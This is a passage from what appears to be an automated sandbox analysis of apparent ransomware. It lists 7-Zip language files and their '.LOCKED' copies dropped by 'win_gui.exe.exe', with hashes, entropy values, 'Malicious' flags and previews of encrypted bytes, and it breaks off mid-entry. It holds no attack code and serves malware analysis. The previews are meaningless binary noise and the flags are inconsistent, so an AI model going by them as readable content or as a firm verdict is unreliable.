                                C:\Program Files\7-Zip\Lang\pt.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10497
                                Entropy (8bit):7.980648811227902
                                Encrypted:false
                                SSDEEP:192:ntUwHJPPd8RwQPvr1FnLoxZ1K3WQUpB9KGm2Io7fG9MsTYRhCjPZ+VOSj:nOqPli9ZFnoZ1mWr75TYY7+Z+VOSj
                                MD5:525EB8EB259D7FF8FFD74876E2850F6B
                                SHA1:B141112419BF9777C36B75844B3ED96B607550FB
                                SHA-256:C23CD0C77C115708E6215EF0F22BC7F362FABA1D044B3F5B66ACE061F39B3821
                                SHA-512:266E7363646F806FA2009D57F471154EAFCF61E3246B057D2BA5E56AE23935943D399A8FDD29FA4CC7B77DA63E4DBA362D59DE4B887605B17FBC72FEAE2DF81F
                                Malicious:false
                                Preview:..l`..a.G...GN...j.....!......~80.tC.......9&.2..#r..<..yks$.?.3.....9...j7E..m...=.@jM......]..{...E|..{z.I..}...'.x...P..J.t)...........M&5R..o..uN.K...g....RO....K....uM...uJ.}b.....|..0*...x..;..K.l./.)..A.(r.s...6.n./.&A..Ve....3P4w..;.......o.o..@%ki....P.g...0=.....}..oT..Vp3.@.y.!...&.v...{.71'.!..S.o.1B...<..%.x..p......-..9.....0.z...zid`.*..r:.Pz.u..b._.>.A.3hq.@Y.k.L..qN..'....ZrP/.....>..".5c.te........BwrK....?(..l60#_.&sMi.2.g.....If$..P.?$....6Y...V(......B7..........?....\i.I..|t..S=c.^..E."!....2......h_.Q........Dq....r..kG...\...;.u......y#-....6..':#...>nWv..qzb.Kr.Yh.'?.....f......u.....fL.N'%.ERay..........\...i....|e..b......\..Y..JZ......]rp.de.}9..'..^'...0...V..e...e.*...6-.....}......?.)U.W.....}I..$(V..H.r.u..rylxi.OO.*.e..P,}`.%....~........Zag....wRct.o1s.[...vJ8..".N..;..6.#\........U|..8E\...L&FvB...(...>..D..2..S'.e....7...q....._..DD1...<.z.M.5...:O...V ....L.m.2A.M..S..V!Q..g.1.;.......gB........-...V.

                                C:\Program Files\7-Zip\Lang\pt.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10497
                                Entropy (8bit):7.980648811227902
                                Encrypted:false
                                SSDEEP:192:ntUwHJPPd8RwQPvr1FnLoxZ1K3WQUpB9KGm2Io7fG9MsTYRhCjPZ+VOSj:nOqPli9ZFnoZ1mWr75TYY7+Z+VOSj
                                MD5:525EB8EB259D7FF8FFD74876E2850F6B
                                SHA1:B141112419BF9777C36B75844B3ED96B607550FB
                                SHA-256:C23CD0C77C115708E6215EF0F22BC7F362FABA1D044B3F5B66ACE061F39B3821
                                SHA-512:266E7363646F806FA2009D57F471154EAFCF61E3246B057D2BA5E56AE23935943D399A8FDD29FA4CC7B77DA63E4DBA362D59DE4B887605B17FBC72FEAE2DF81F
                                Malicious:false
                                Preview:..l`..a.G...GN...j.....!......~80.tC.......9&.2..#r..<..yks$.?.3.....9...j7E..m...=.@jM......]..{...E|..{z.I..}...'.x...P..J.t)...........M&5R..o..uN.K...g....RO....K....uM...uJ.}b.....|..0*...x..;..K.l./.)..A.(r.s...6.n./.&A..Ve....3P4w..;.......o.o..@%ki....P.g...0=.....}..oT..Vp3.@.y.!...&.v...{.71'.!..S.o.1B...<..%.x..p......-..9.....0.z...zid`.*..r:.Pz.u..b._.>.A.3hq.@Y.k.L..qN..'....ZrP/.....>..".5c.te........BwrK....?(..l60#_.&sMi.2.g.....If$..P.?$....6Y...V(......B7..........?....\i.I..|t..S=c.^..E."!....2......h_.Q........Dq....r..kG...\...;.u......y#-....6..':#...>nWv..qzb.Kr.Yh.'?.....f......u.....fL.N'%.ERay..........\...i....|e..b......\..Y..JZ......]rp.de.}9..'..^'...0...V..e...e.*...6-.....}......?.)U.W.....}I..$(V..H.r.u..rylxi.OO.*.e..P,}`.%....~........Zag....wRct.o1s.[...vJ8..".N..;..6.#\........U|..8E\...L&FvB...(...>..D..2..S'.e....7...q....._..DD1...<.z.M.5...:O...V ....L.m.2A.M..S..V!Q..g.1.;.......gB........-...V.

                                C:\Program Files\7-Zip\Lang\ro.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8181
                                Entropy (8bit):7.981091285459677
                                Encrypted:false
                                SSDEEP:192:ssuemrwKcwHGi80CXA8hMj7p91Cm0gbuCFSJ+VOY:snePGGv0CXDhMnpDCm0gbuQSJ+VOY
                                MD5:CE7FCAE2BA058E7AE865EE9C17647326
                                SHA1:6F8D48ABBD8014D87AFE48F18AD6626806E61926
                                SHA-256:12D54C2B945A4E318D7C13D273CBCDE5E227B0CE20A410C799BD245FCF012968
                                SHA-512:8548A990C64D04D8E7DF5D8D47F50D695192611508C456124BD2C96BC6079BC71878D455AE52B2870E019B6D558B5FF8CB33AB42D61B74113E5E016720D7DD21
                                Malicious:false
                                Preview:.Fv4B/B..,.c...2\7O.../\.%.}...F.....*]...s.,../.[.Emi.%.$.4.M..Iq.1.|..B....p.\m...(k.nS.GeH. gXw>...d.....4...y...9(.;......9......OP.YD.g..3'.[.l.\/fp.....M$..i...,>.Xn....V....dkJJ.WQ....B$.9..%....h],..AdtN.%....3..9.j....~;".E.V.P0.f.y4....B...''.j5 .....[qX..#.U..8E#..+...`....e.....!........u..&s.0.......j.....E.l9.......).V.0pB..gR.3..r./!....o.}..\..h.<.P...........#'....z..d.@.:O...a.b...........).R <.~z.+.....G)...\.S...32.c'..H.....{K1...v.'....`.pyll..PO...#J.....z.6'....b.....3}..X.6`.zh...2.n..O...q1..........R...OD.M@..A#...E....L,....b.y....s.N....b.s.&:.Z.....5......^Z..Z.......i.K.v...|5..@.u...f.$...t.....y.y..R..=1<6VFZ\bC...76....[......2.-oj...4m(..J.".......ET.hqs.z..~..q.....#.......R..am.5.Y....~..N-.Up........M..T..x.>.;..N........F}.c.]RZ....E..(.,...KlBc......X:t......q..\........|.....;H.."..f......4.sL.^'....c ...>...\.c...$...Sk..*..P...6.D..Zo..\X.4o..2....%t...O7Np."..B....:.zB.CHO.[7j..?s..U.uL...B..(u

                                C:\Program Files\7-Zip\Lang\ro.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8181
                                Entropy (8bit):7.981091285459677
                                Encrypted:false
                                SSDEEP:192:ssuemrwKcwHGi80CXA8hMj7p91Cm0gbuCFSJ+VOY:snePGGv0CXDhMnpDCm0gbuQSJ+VOY
                                MD5:CE7FCAE2BA058E7AE865EE9C17647326
                                SHA1:6F8D48ABBD8014D87AFE48F18AD6626806E61926
                                SHA-256:12D54C2B945A4E318D7C13D273CBCDE5E227B0CE20A410C799BD245FCF012968
                                SHA-512:8548A990C64D04D8E7DF5D8D47F50D695192611508C456124BD2C96BC6079BC71878D455AE52B2870E019B6D558B5FF8CB33AB42D61B74113E5E016720D7DD21
                                Malicious:false
                                Preview:.Fv4B/B..,.c...2\7O.../\.%.}...F.....*]...s.,../.[.Emi.%.$.4.M..Iq.1.|..B....p.\m...(k.nS.GeH. gXw>...d.....4...y...9(.;......9......OP.YD.g..3'.[.l.\/fp.....M$..i...,>.Xn....V....dkJJ.WQ....B$.9..%....h],..AdtN.%....3..9.j....~;".E.V.P0.f.y4....B...''.j5 .....[qX..#.U..8E#..+...`....e.....!........u..&s.0.......j.....E.l9.......).V.0pB..gR.3..r./!....o.}..\..h.<.P...........#'....z..d.@.:O...a.b...........).R <.~z.+.....G)...\.S...32.c'..H.....{K1...v.'....`.pyll..PO...#J.....z.6'....b.....3}..X.6`.zh...2.n..O...q1..........R...OD.M@..A#...E....L,....b.y....s.N....b.s.&:.Z.....5......^Z..Z.......i.K.v...|5..@.u...f.$...t.....y.y..R..=1<6VFZ\bC...76....[......2.-oj...4m(..J.".......ET.hqs.z..~..q.....#.......R..am.5.Y....~..N-.Up........M..T..x.>.;..N........F}.c.]RZ....E..(.,...KlBc......X:t......q..\........|.....;H.."..f......4.sL.^'....c ...>...\.c...$...Sk..*..P...6.D..Zo..\X.4o..2....%t...O7Np."..B....:.zB.CHO.[7j..?s..U.uL...B..(u

                                C:\Program Files\7-Zip\Lang\ru.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15974
                                Entropy (8bit):7.989960786463422
                                Encrypted:false
                                SSDEEP:384:Ff70Iy9MbkLawLDL/0trkoNwkGet+aueZ2+VO2:Be2bkLLWrkoSkG7Y2S
                                MD5:89CFD6B668ED95DDC457614D0370D226
                                SHA1:6AC839D1F45C62AF146674ED3789A407994F08E7
                                SHA-256:B85AE6EC58328096896693333F7AFADBE41C8517CA0AED4E7BA4CE038243818F
                                SHA-512:7FE21D625DE2E8FC584E5638BC7421DE121718A92E54F89329071C3E3C987D66206A0B59BF5E7914B275CDCC6E42AEA76E96EA6B8871B3FEC61F164C914E8053
                                Malicious:false
                                Preview:`......i.}7..A.../..r...$..b.!m"@m..6V.S.Fb.|y.."m.k.?......j..g.&X..j.f..[[b...Z......ke.....j.. .U.La.......9>..<n\......n....<..GH.c..'..1!.f.5.'..N.o. .+;...U.Kr..z..}./.7.u./h..^..Q,-.a.u.6....Q..)...H..30.2......z..M....z...`......urk........u.6/[l.......j.>.......gj..C.]_...N 6........2..Zj....?....W....`.I..B..r1..."..[E'a.b8.b!k3........{.....Vw..d...../~3...Z.7..8.._..E..j.0..<.C...C.T.?I...w..E.X..&.....d.ao..OF.`|].]8...B...\..v......K<.....E..@.....0.........2.eAq..h.e.L`.3'.!6.s..W)./.\.5U..6.....R..G....Is..B.....gB./..........`(.g....d..c.dc).1_.b2L.....u.f.c4eswM$..m..1......99...Z%..T.0k...>Yr.M].......(..yf..P........C].Y...y..$.ya..)...Zh....bU..j..Je9.?.n,....9.n@..3...&p._...."..HWW...*9..U..5U|..Z.LT.A....H...t.p5?..j.."mV.u.A....&.{.f.:..YH..=3......u..B.GP.........3..[F........>...].;.*}@m:.s....c^.....\.3.NIX;'v...YV.B....k.I...!l.m...fF7...G..v.....q...S..m.(.r.!..r..H...........<4..Lu..P...Q..2)

                                C:\Program Files\7-Zip\Lang\ru.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15974
                                Entropy (8bit):7.989960786463422
                                Encrypted:false
                                SSDEEP:384:Ff70Iy9MbkLawLDL/0trkoNwkGet+aueZ2+VO2:Be2bkLLWrkoSkG7Y2S
                                MD5:89CFD6B668ED95DDC457614D0370D226
                                SHA1:6AC839D1F45C62AF146674ED3789A407994F08E7
                                SHA-256:B85AE6EC58328096896693333F7AFADBE41C8517CA0AED4E7BA4CE038243818F
                                SHA-512:7FE21D625DE2E8FC584E5638BC7421DE121718A92E54F89329071C3E3C987D66206A0B59BF5E7914B275CDCC6E42AEA76E96EA6B8871B3FEC61F164C914E8053
                                Malicious:false
                                Preview:`......i.}7..A.../..r...$..b.!m"@m..6V.S.Fb.|y.."m.k.?......j..g.&X..j.f..[[b...Z......ke.....j.. .U.La.......9>..<n\......n....<..GH.c..'..1!.f.5.'..N.o. .+;...U.Kr..z..}./.7.u./h..^..Q,-.a.u.6....Q..)...H..30.2......z..M....z...`......urk........u.6/[l.......j.>.......gj..C.]_...N 6........2..Zj....?....W....`.I..B..r1..."..[E'a.b8.b!k3........{.....Vw..d...../~3...Z.7..8.._..E..j.0..<.C...C.T.?I...w..E.X..&.....d.ao..OF.`|].]8...B...\..v......K<.....E..@.....0.........2.eAq..h.e.L`.3'.!6.s..W)./.\.5U..6.....R..G....Is..B.....gB./..........`(.g....d..c.dc).1_.b2L.....u.f.c4eswM$..m..1......99...Z%..T.0k...>Yr.M].......(..yf..P........C].Y...y..$.ya..)...Zh....bU..j..Je9.?.n,....9.n@..3...&p._...."..HWW...*9..U..5U|..Z.LT.A....H...t.p5?..j.."mV.u.A....&.{.f.:..YH..=3......u..B.GP.........3..[F........>...].;.*}@m:.s....c^.....\.3.NIX;'v...YV.B....k.I...!l.m...fF7...G..v.....q...S..m.(.r.!..r..H...........<4..Lu..P...Q..2)

                                C:\Program Files\7-Zip\Lang\sa.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19846
                                Entropy (8bit):7.990788402256383
                                Encrypted:true
                                SSDEEP:384:Wfw62Z1GfJ6tyXr4VhG7q+XMQS3QJPNCJL5mwu7kPIsknEI/xT9eUn4sHLqLh1hk:j6+GfotyXCMr8QNVykkPIsknEIdIkHLh
                                MD5:E3769A04AD718D0DD21653BEACECF8B7
                                SHA1:5981107DC6329422E174565FEF6F102951164AF2
                                SHA-256:AC75E7F37A723EF327AD73069B0166680E2ACE46118CCC3F5A6295156CFBC9B9
                                SHA-512:42C52732381690011EDE26DA010A616820A1CE0A5981680C825327BA34BDF10EA34B8499A78AE492A750D530DA5054CFA3DD385BAA05BECD1E5E67BFC267976B
                                Malicious:true
                                Preview:..>.....1......1(.N....jd........}...f[.3B...F......,...4.a.........`..Rvd..a...U...y...a>>...pk.e#$d.T~...l..q.Q.8.f.v....~[...........W..K.'...P........P..}.....i...[.`<.k..E...4e..i.....;h...$...%r.....uux...&...{.;...j.../9.=....V....<N..j..sM8...z<4..CXW...Hw.kg./r.../.Ccy..4g.....t ..".}t..G?..l.......{.I9.T.4.YA...U\........y*.9@...9T.$..k#0.X...z6}..L..~...hG.x...6..,..N...gNt..s0.....e.N..Q...r.......Q.f...J.&e.7.1..U...@...J....vK3._.A..o]w.....N,!.[......H.,.a.t._.Y.V...t.uw..sCS1p..s....!.R.....B...|.....U...E..,..B:../!....r....9.a.8E...G....7=(...@.R.........U....y...RNJ.....].#..k.$.8:n...R.>.."..f...p..".(}'q.....H.g..%.....;....*P(}.....'k.t....h..[....S..2k....5....a.. .R.6.M.C...`..1.....Mo.@.....2....Q...}Gf.5.+...Q..n.....#.H...Q.o6O$..v@....F.f.&..*.....j|?...#.....V.r[."..&v.)}.q...3jg...2..w....n&v..y:g..#..3.".xkhE.......89.....PD....@.7q..}.b6..w....M.7 ..n....OZ>.3..s...4.-2/.S...mr...Sq....;5...^`{.m

                                C:\Program Files\7-Zip\Lang\sa.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19846
                                Entropy (8bit):7.990788402256383
                                Encrypted:true
                                SSDEEP:384:Wfw62Z1GfJ6tyXr4VhG7q+XMQS3QJPNCJL5mwu7kPIsknEI/xT9eUn4sHLqLh1hk:j6+GfotyXCMr8QNVykkPIsknEIdIkHLh
                                MD5:E3769A04AD718D0DD21653BEACECF8B7
                                SHA1:5981107DC6329422E174565FEF6F102951164AF2
                                SHA-256:AC75E7F37A723EF327AD73069B0166680E2ACE46118CCC3F5A6295156CFBC9B9
                                SHA-512:42C52732381690011EDE26DA010A616820A1CE0A5981680C825327BA34BDF10EA34B8499A78AE492A750D530DA5054CFA3DD385BAA05BECD1E5E67BFC267976B
                                Malicious:true
                                Preview:..>.....1......1(.N....jd........}...f[.3B...F......,...4.a.........`..Rvd..a...U...y...a>>...pk.e#$d.T~...l..q.Q.8.f.v....~[...........W..K.'...P........P..}.....i...[.`<.k..E...4e..i.....;h...$...%r.....uux...&...{.;...j.../9.=....V....<N..j..sM8...z<4..CXW...Hw.kg./r.../.Ccy..4g.....t ..".}t..G?..l.......{.I9.T.4.YA...U\........y*.9@...9T.$..k#0.X...z6}..L..~...hG.x...6..,..N...gNt..s0.....e.N..Q...r.......Q.f...J.&e.7.1..U...@...J....vK3._.A..o]w.....N,!.[......H.,.a.t._.Y.V...t.uw..sCS1p..s....!.R.....B...|.....U...E..,..B:../!....r....9.a.8E...G....7=(...@.R.........U....y...RNJ.....].#..k.$.8:n...R.>.."..f...p..".(}'q.....H.g..%.....;....*P(}.....'k.t....h..[....S..2k....5....a.. .R.6.M.C...`..1.....Mo.@.....2....Q...}Gf.5.+...Q..n.....#.H...Q.o6O$..v@....F.f.&..*.....j|?...#.....V.r[."..&v.)}.q...3jg...2..w....n&v..y:g..#..3.".xkhE.......89.....PD....@.7q..}.b6..w....M.7 ..n....OZ>.3..s...4.-2/.S...mr...Sq....;5...^`{.m

                                C:\Program Files\7-Zip\Lang\si.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19809
                                Entropy (8bit):7.98929377950728
                                Encrypted:false
                                SSDEEP:384:JOPyrg3GhoBfFoKefuzzgB6Lt9n6um+OUBKPPhxX+VOi:hrg3GhofFobmzU0b6biIP7e
                                MD5:339E67BF0B5A9CCE9D2B9E46E743CDF9
                                SHA1:94DA17FE713C907DD102269D6D4EC3861E0CD9BB
                                SHA-256:65885C1CEFE203E168D3E8778168E2341D23C473465814CDA9E42292D1CA07C9
                                SHA-512:7E29A21839F95B30F134053BE6337D1ED873D507A9C438F869CAC10206A08D7762D72747036E4827335318EAAE255BDACAA61019334FB0938BB48B28DB306BCA
                                Malicious:false
                                Preview:/z...E.a.......>.x.m2 ..1._...c.w......e...<....u|EnS....kW...U..S...}...c.>2..Qg...gX..$....'......}..u..c.}...K.I.qN.........A.2.,".$.G...X.oN..`|)..E..'..zp.sJ.~.....\3.....NQ'=...B"..H"p.p....m..Le.'.W......@....95B)A.0..T..M..G.%o.?:..R..G..ZK0./R....H..a..h{....36S.Z={.!....gZ....T........E....t.}7.......8@.5z\..{l.C,.sDX..!.Zz....k.>..I`O...h... h...vv.3.~.N...v.. o..t..p.......@O.v...;..;.jw...e....]]`u..Hcowv...=..k...1..%`{~.u..g...zmj...._...,.XOMi.|l..R...5...!U.Gd..c|W.9I\x......H.......R....5.M.0D}`.s.I.[....a.2...u.y6..?u....#.m..u.E...2...B."}'xI..l...g5"..N..%3...w....Y.....Os<.....&..............3.-..W.......}....H...bun6.v"WYz..J~.. ..~bc.G*..>...9.E\z...0$!.h. u.,Hj-[.'.TQ...5...o.....W.a.....;...\P...09k......G.t.3.Z...P.......WH6.xS.\..W.4.OJ.NH..an...:1%@.&.X$.......E!.H.(.."}.._{.Q....R...i...gW.z..N..e...{\^F........>.}...`.5=..C...Q.....(..h...Us...l..IFQ...VN....A ..:..LJ.8.'/..Igc.......3*.u.Yg......N......}l..Z..}x.

                                C:\Program Files\7-Zip\Lang\si.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19809
                                Entropy (8bit):7.98929377950728
                                Encrypted:false
                                SSDEEP:384:JOPyrg3GhoBfFoKefuzzgB6Lt9n6um+OUBKPPhxX+VOi:hrg3GhofFobmzU0b6biIP7e
                                MD5:339E67BF0B5A9CCE9D2B9E46E743CDF9
                                SHA1:94DA17FE713C907DD102269D6D4EC3861E0CD9BB
                                SHA-256:65885C1CEFE203E168D3E8778168E2341D23C473465814CDA9E42292D1CA07C9
                                SHA-512:7E29A21839F95B30F134053BE6337D1ED873D507A9C438F869CAC10206A08D7762D72747036E4827335318EAAE255BDACAA61019334FB0938BB48B28DB306BCA
                                Malicious:false
                                Preview:/z...E.a.......>.x.m2 ..1._...c.w......e...<....u|EnS....kW...U..S...}...c.>2..Qg...gX..$....'......}..u..c.}...K.I.qN.........A.2.,".$.G...X.oN..`|)..E..'..zp.sJ.~.....\3.....NQ'=...B"..H"p.p....m..Le.'.W......@....95B)A.0..T..M..G.%o.?:..R..G..ZK0./R....H..a..h{....36S.Z={.!....gZ....T........E....t.}7.......8@.5z\..{l.C,.sDX..!.Zz....k.>..I`O...h... h...vv.3.~.N...v.. o..t..p.......@O.v...;..;.jw...e....]]`u..Hcowv...=..k...1..%`{~.u..g...zmj...._...,.XOMi.|l..R...5...!U.Gd..c|W.9I\x......H.......R....5.M.0D}`.s.I.[....a.2...u.y6..?u....#.m..u.E...2...B."}'xI..l...g5"..N..%3...w....Y.....Os<.....&..............3.-..W.......}....H...bun6.v"WYz..J~.. ..~bc.G*..>...9.E\z...0$!.h. u.,Hj-[.'.TQ...5...o.....W.a.....;...\P...09k......G.t.3.Z...P.......WH6.xS.\..W.4.OJ.NH..an...:1%@.&.X$.......E!.H.(.."}.._{.Q....R...i...gW.z..N..e...{\^F........>.}...`.5=..C...Q.....(..h...Us...l..IFQ...VN....A ..:..LJ.8.'/..Igc.......3*.u.Yg......N......}l..Z..}x.

                                C:\Program Files\7-Zip\Lang\sk.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9980
                                Entropy (8bit):7.981065188766269
                                Encrypted:false
                                SSDEEP:192:xIqk5Zqk2GC6WZlMDM/AznMODNmYmCcDRHHzG8KCPG4VGzVcW+VO7q:xIF9XilMA/ADN521T2CP5qVH+VOe
                                MD5:BF00E4537DE61930D13643BDEFD8D380
                                SHA1:B56510738B6CCEC6EDEC7F2BDEA203A013D92105
                                SHA-256:ADD081B68A3ECA55359465E7BF03FE3F57723A7C4754D79FA67B58B0129F20BB
                                SHA-512:D111F7B61FE8D3CAB31645C05E4607ECCBFA2D81391707210B7AF2B00983C7258B9D6C61AA970DDF8E7C2F45407A77445D0669541412796A999EDF603F69B280
                                Malicious:false
                                Preview:|.^...4F.*Dw..2v..$]Ma.<..4.....y.c....5%v.$.P.K..(.N.+/_O.J........<..yl.\..2.2..r...{...@.../....E8.r.abz.f..{;Qt.-.u.l..=...j.*...#%.$.nJ..;.4.|<..V.d/...R%..q.........).(.|.7~G.l.>...>...Of.....[.eHc.....6..eaL6C....F...e#......>8.Y.....p.N....`...\;`_K....Bm..>'.".......a.>.[E..t.u.:.<...$.bewb..>!."....A.c....[pD.b....x\.JD...........) ...%+....?...eQ!6..v@.> PJ..6-).=...9.........*......yw....t..V.nRi.k...8....y`.....D.t...XP..i....o..W.,>.y..9f..'I.....$VK..........Yy..2..y./.}!..OML.D.....hJ.......a...=. ..l....=.~.. .h.......4Qo....ko..].j.;...g..T.......].Pq...._.C.....V6......(|.&W.......(.d.,!...q.}[..{.._'S.|#.{....~..I|x.q./B...fr..|TI.Bs.Q.P..F.WLw.Lf.-..O.T..T....s..@..+.Gn...C._..X..q}.%"?+h.;.Q..9.`........U..4..&..B%41.Y...O.&......^........x..d..(.w].H..8:,.B...C..-.....M.0.(..r..X..*.6W.....BP..|M.>..=5..........G..=..B..m..4Z....c)...Q0..Rg`.1.. E.m.H ..%..X.Se...XA..X{..V.M&K..f....t..`:....v.b?...X...

                                C:\Program Files\7-Zip\Lang\sk.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9980
                                Entropy (8bit):7.981065188766269
                                Encrypted:false
                                SSDEEP:192:xIqk5Zqk2GC6WZlMDM/AznMODNmYmCcDRHHzG8KCPG4VGzVcW+VO7q:xIF9XilMA/ADN521T2CP5qVH+VOe
                                MD5:BF00E4537DE61930D13643BDEFD8D380
                                SHA1:B56510738B6CCEC6EDEC7F2BDEA203A013D92105
                                SHA-256:ADD081B68A3ECA55359465E7BF03FE3F57723A7C4754D79FA67B58B0129F20BB
                                SHA-512:D111F7B61FE8D3CAB31645C05E4607ECCBFA2D81391707210B7AF2B00983C7258B9D6C61AA970DDF8E7C2F45407A77445D0669541412796A999EDF603F69B280
                                Malicious:false
                                Preview:|.^...4F.*Dw..2v..$]Ma.<..4.....y.c....5%v.$.P.K..(.N.+/_O.J........<..yl.\..2.2..r...{...@.../....E8.r.abz.f..{;Qt.-.u.l..=...j.*...#%.$.nJ..;.4.|<..V.d/...R%..q.........).(.|.7~G.l.>...>...Of.....[.eHc.....6..eaL6C....F...e#......>8.Y.....p.N....`...\;`_K....Bm..>'.".......a.>.[E..t.u.:.<...$.bewb..>!."....A.c....[pD.b....x\.JD...........) ...%+....?...eQ!6..v@.> PJ..6-).=...9.........*......yw....t..V.nRi.k...8....y`.....D.t...XP..i....o..W.,>.y..9f..'I.....$VK..........Yy..2..y./.}!..OML.D.....hJ.......a...=. ..l....=.~.. .h.......4Qo....ko..].j.;...g..T.......].Pq...._.C.....V6......(|.&W.......(.d.,!...q.}[..{.._'S.|#.{....~..I|x.q./B...fr..|TI.Bs.Q.P..F.WLw.Lf.-..O.T..T....s..@..+.Gn...C._..X..q}.%"?+h.;.Q..9.`........U..4..&..B%41.Y...O.&......^........x..d..(.w].H..8:,.B...C..-.....M.0.(..r..X..*.6W.....BP..|M.>..=5..........G..=..B..m..4Z....c)...Q0..Rg`.1.. E.m.H ..%..X.Se...XA..X{..V.M&K..f....t..`:....v.b?...X...

                                C:\Program Files\7-Zip\Lang\sl.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9529
                                Entropy (8bit):7.977336470367158
                                Encrypted:false
                                SSDEEP:192:ZYP/YQ+Rs9PxM2GODZDUQl06cdddNfzesA8zpKtaz23c7eGq+VOa:ZWmRsVDZ3lS7/fa2VMaz2BD+VOa
                                MD5:EA0335CB0309EBBFEC6D7B3022C4CF01
                                SHA1:D5AC42CF2696944752C89A1A4209B59652FF8F96
                                SHA-256:820CEB7B0DD7C8D7C45D8904BF8B118F154A187C4EE4745952AEB032F70A1309
                                SHA-512:0F639E3CE7E38D1A97CF86D33B414D710701DCD62F6125A0B256A2115F38DC5C37A21C426BBAAA038D68C65C6D4610B976EAC6CBA6DECB2C3645F0F3EE453621
                                Malicious:false
                                Preview:...j.Sf...e..@u.%....7....3.e..~i...w...k..D.G..$.{.R.I9..q5A..fi.@U5..Z...i79.Z..M....3ii.......'6.oj.......{.dl....:,<.Wj....y.v.Y...7...=4...o.T;....^{..7.*pm...v.|.D3.ZU........4......A..0......J.d.-...<.J...8!-....F.'..&%.k..v..E..<7....I.d.Q.w....L..(.w...O...P.e}.. .VMv.i...0Z3..*\B(.u..WY..h.-g.7.$.;...0.I.".t]....5eF#..H..J..&...#....b....j.A../..8J...a.m(.........8b.....[.:.z......v<.K.(..C.......!...f.,9oM).g.(.6.O7L.{[..f......f.~.........6..K.......c.3...w...0/W...C....?.6&/n-0.Zk.C-.....<"xU..................yU...u)4Qws.I..("...j."'...x..n.....2.._../...I..>.`G..;ojM....Y+.r.f.....*....5-... ..e.S27p.. ..7w...w.Pk..-..u...4....'I2}._....c.d...$.0..YD.yYM...w...`..cu..xpb...u.......:...[..K*...."..._#...Hzq?.t.o....M^B...%...B..C.....&.bv...t.E;..q.)>.1.l.&.........2.....0.....`Zi.Upy...X....i.~:-!.A........EN.)..=Qh....+H.jA]K...R\.;p}z....'.*{|..L..As1....9....N.0..Q.....y......E.W..A...$.....a..V.\l(.Q..nu<..2*.._.....c.;..

                                C:\Program Files\7-Zip\Lang\sl.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9529
                                Entropy (8bit):7.977336470367158
                                Encrypted:false
                                SSDEEP:192:ZYP/YQ+Rs9PxM2GODZDUQl06cdddNfzesA8zpKtaz23c7eGq+VOa:ZWmRsVDZ3lS7/fa2VMaz2BD+VOa
                                MD5:EA0335CB0309EBBFEC6D7B3022C4CF01
                                SHA1:D5AC42CF2696944752C89A1A4209B59652FF8F96
                                SHA-256:820CEB7B0DD7C8D7C45D8904BF8B118F154A187C4EE4745952AEB032F70A1309
                                SHA-512:0F639E3CE7E38D1A97CF86D33B414D710701DCD62F6125A0B256A2115F38DC5C37A21C426BBAAA038D68C65C6D4610B976EAC6CBA6DECB2C3645F0F3EE453621
                                Malicious:false
                                Preview:...j.Sf...e..@u.%....7....3.e..~i...w...k..D.G..$.{.R.I9..q5A..fi.@U5..Z...i79.Z..M....3ii.......'6.oj.......{.dl....:,<.Wj....y.v.Y...7...=4...o.T;....^{..7.*pm...v.|.D3.ZU........4......A..0......J.d.-...<.J...8!-....F.'..&%.k..v..E..<7....I.d.Q.w....L..(.w...O...P.e}.. .VMv.i...0Z3..*\B(.u..WY..h.-g.7.$.;...0.I.".t]....5eF#..H..J..&...#....b....j.A../..8J...a.m(.........8b.....[.:.z......v<.K.(..C.......!...f.,9oM).g.(.6.O7L.{[..f......f.~.........6..K.......c.3...w...0/W...C....?.6&/n-0.Zk.C-.....<"xU..................yU...u)4Qws.I..("...j."'...x..n.....2.._../...I..>.`G..;ojM....Y+.r.f.....*....5-... ..e.S27p.. ..7w...w.Pk..-..u...4....'I2}._....c.d...$.0..YD.yYM...w...`..cu..xpb...u.......:...[..K*...."..._#...Hzq?.t.o....M^B...%...B..C.....&.bv...t.E;..q.)>.1.l.&.........2.....0.....`Zi.Upy...X....i.~:-!.A........EN.)..=Qh....+H.jA]K...R\.;p}z....'.*{|..L..As1....9....N.0..Q.....y......E.W..A...$.....a..V.\l(.Q..nu<..2*.._.....c.;..

                                C:\Program Files\7-Zip\Lang\sq.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6591
